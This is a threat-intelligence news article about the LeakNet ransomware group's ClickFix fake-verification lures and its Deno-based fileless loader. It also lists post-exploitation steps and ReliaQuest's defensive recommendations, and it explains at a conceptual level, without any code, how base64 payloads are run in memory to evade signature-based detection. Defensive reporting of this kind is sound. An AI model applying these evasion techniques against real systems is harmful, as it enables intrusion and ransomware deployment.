The LeakNet ransomware group is rapidly scaling its operations with two dangerous innovations: a social engineering technique called ClickFix and a previously unreported fileless loader built on the legitimate Deno JavaScript runtime.
According to ReliaQuest research, LeakNet has shifted away from purchasing stolen credentials from initial access brokers (IABs). Instead, the group now plants fake verification pages on compromised but otherwise legitimate websites, casting a much wider net for victims.
ClickFix Social Engineering: Fake Cloudflare Verification
The ClickFix technique presents victims with what appears to be a standard Cloudflare Turnstile verification check. Users are then prompted to manually run a command—often through the Windows Run dialog (Win+R)—that initiates the infection chain.
Because these lures are hosted on real websites rather than attacker-owned domains, standard network-layer defenses generate far fewer alerts. The red flag only appears after the user has already executed the malicious command, shifting the burden to behavioral monitoring of suspicious msiexec commands and unexpected outbound connections.
ClickFix has become a preferred delivery method across the threat landscape, facilitating the distribution of 59% of the top malware families tracked in 2025.
The Deno-Based Fileless Loader: BYOR Attack
The most technically dangerous component of LeakNet’s toolkit is a loader built on Deno, a legitimate JavaScript and TypeScript runtime used daily by developers.
LeakNet employs a bring-your-own-runtime (BYOR) approach: instead of deploying a custom malicious binary that might trigger security tools, the attackers install the real, trusted Deno executable on the victim’s machine and use it to run harmful code.
The loader is activated through PowerShell and Visual Basic Script files, notably named Romeo*.ps1 and Juliet*.vbs. Rather than writing a JavaScript file to disk where it could be scanned, LeakNet feeds the payload to Deno as a base64-encoded data URL, which Deno decodes and runs entirely in memory.
No standard file ever touches the endpoint, making the entire process nearly invisible to signature-based security tools.
Post-Exploitation Behavior
Once the loader runs, it:
- Collects system details (username, hostname, memory size, OS version)
- Creates a unique victim fingerprint
- Connects to attacker-controlled infrastructure for a victim-specific second-stage payload
- Prevents duplicate instances by binding to a local port
- Enters a looping cycle of fetching and executing further code in memory
Defensive Recommendations
ReliaQuest recommends the following mitigations:
- Block newly registered domains — LeakNet’s C2 servers are typically only weeks old
- Restrict Win+R commands — Regular users should not be able to run arbitrary commands
- Limit PsExec — Restrict to authorized administrators through Group Policy Objects
- Monitor for jli.dll sideloading in
C:\ProgramData\USOShared - Watch for unusual outbound S3 bucket connections
- Isolate compromised hosts immediately upon detecting post-exploitation behavior
Why This Matters
LeakNet’s combination of mass social engineering via ClickFix and fileless execution via Deno represents a significant evolution in ransomware operations. By avoiding purchased credentials and disk-based payloads, the group minimizes its attack surface footprint while maximizing victim reach.
Organizations relying solely on domain blocklists and file-based detection will find these attacks difficult to catch before damage occurs. Behavioral monitoring and rapid incident isolation are now critical defensive requirements.
Source: Cybersecurity News / ReliaQuest
